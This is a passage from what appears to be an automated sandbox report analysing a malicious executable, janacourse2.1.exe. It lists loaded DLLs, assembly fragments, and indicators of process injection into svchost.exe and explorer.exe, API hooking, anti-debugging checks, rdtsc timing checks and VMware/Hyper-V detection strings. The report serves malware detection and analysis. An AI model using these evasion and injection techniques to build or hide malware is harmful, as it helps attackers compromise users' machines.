          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: janacourse2.1.exe Static file information: File size 1796096 > 1048576
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: janacourse2.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Binary string: explorer.pdbUGP source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: janacourse2.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: janacourse2.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: janacourse2.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: janacourse2.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: janacourse2.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00FB42DE
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD0A76 push ecx; ret 0_2_00FD0A89
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417933 push esi; ret 1_2_00417934
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041E9AD push dword ptr [D2425A3Fh]; ret 1_2_0041E9CF
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416B48 push ebp; retf 1_2_00416B63
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409BA9 push ecx; ret 1_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041D4D2 push eax; ret 1_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041D4DB push eax; ret 1_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041D485 push eax; ret 1_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417D70 push ebx; ret 1_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041D53C push eax; ret 1_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417D9A push ebx; ret 1_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340225F pushad ; ret 1_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034027FA pushad ; ret 1_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx 1_2_034309B6
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340283D push eax; iretd 1_2_03402858
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340135E push eax; iretd 1_2_03401369
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DEB02 push esp; retn 0000h 1_2_032DEB03
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DEB1E push esp; retn 0000h 1_2_032DEB1F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE9B5 push esp; retn 0000h 1_2_032DEAE7
          Source: C:\Windows\explorer.exe Code function: 2_2_0E5BCB1E push esp; retn 0000h 2_2_0E5BCB1F
          Source: C:\Windows\explorer.exe Code function: 2_2_0E5BCB02 push esp; retn 0000h 2_2_0E5BCB03
          Source: C:\Windows\explorer.exe Code function: 2_2_0E5BC9B5 push esp; retn 0000h 2_2_0E5BCAE7
          Source: C:\Windows\explorer.exe Code function: 2_2_10CFD9B5 push esp; retn 0000h 2_2_10CFDAE7
          Source: C:\Windows\explorer.exe Code function: 2_2_10CFDB02 push esp; retn 0000h 2_2_10CFDB03
          Source: C:\Windows\explorer.exe Code function: 2_2_10CFDB1E push esp; retn 0000h 2_2_10CFDB1F
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_04AB27FA pushad ; ret 3_2_04AB27F9
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_04AB225F pushad ; ret 3_2_04AB27F9
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_04AB283D push eax; iretd 3_2_04AB2858
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_04AE09AD push ecx; mov dword ptr [esp], ecx 3_2_04AE09B6
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 3_2_029ED485 push eax; ret 3_2_029ED4D8

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE2
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FCF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00FCF98E
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01041C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_01041C41
          Source: C:\Users\user\Desktop\janacourse2.1.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\janacourse2.1.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-95580
          Source: C:\Users\user\Desktop\janacourse2.1.exe API/Special instruction interceptor: Address: 14DBC2C
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5576
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4366
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 888
          Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 9784
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\janacourse2.1.exe API coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exe API coverage: 2.0 %
          Source: C:\Windows\SysWOW64\explorer.exe API coverage: 2.2 %
          Source: C:\Windows\explorer.exe TID: 7660 Thread sleep count: 5576 > 30
          Source: C:\Windows\explorer.exe TID: 7660 Thread sleep time: -11152000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7660 Thread sleep count: 4366 > 30
          Source: C:\Windows\explorer.exe TID: 7660 Thread sleep time: -8732000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524 Thread sleep count: 186 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524 Thread sleep time: -372000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524 Thread sleep count: 9784 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7524 Thread sleep time: -19568000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0102698F
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_010268EE FindFirstFileW,FindClose, 0_2_010268EE
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0101D076
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0101D3A9
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0102979D
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_01029642
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_01029B2B
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0101DBBE
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_01025C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_01025C97
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00FB42DE
          Source: explorer.exe, 00000002.00000002.2898901245.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000002.2898901245.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000000.1665725530.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: janacourse2.1.exe, 00000000.00000002.1652629769.0000000001178000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A1KvmCiZKdUEI0cV
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.1665725530.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.2898200264.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000000.1669146170.000000000CA96000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040ACF0 LdrLoadDll, 1_2_0040ACF0
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102EAA2 BlockInput, 0_2_0102EAA2
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00FE2622
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00FB42DE
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_00FD4CE8 mov eax, dword ptr fs:[00000030h] 0_2_00FD4CE8
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_014DA858 mov eax, dword ptr fs:[00000030h] 0_2_014DA858
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_014DBEF8 mov eax, dword ptr fs:[00000030h] 0_2_014DBEF8
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_014DBE98 mov eax, dword ptr fs:[00000030h] 0_2_014DBE98
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h] 1_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h] 1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h] 1_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h] 1_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h] 1_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350634F mov eax, dword ptr fs:[00000030h] 1_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D437C mov eax, dword ptr fs:[00000030h] 1_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h] 1_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h] 1_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h] 1_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h] 1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h] 1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
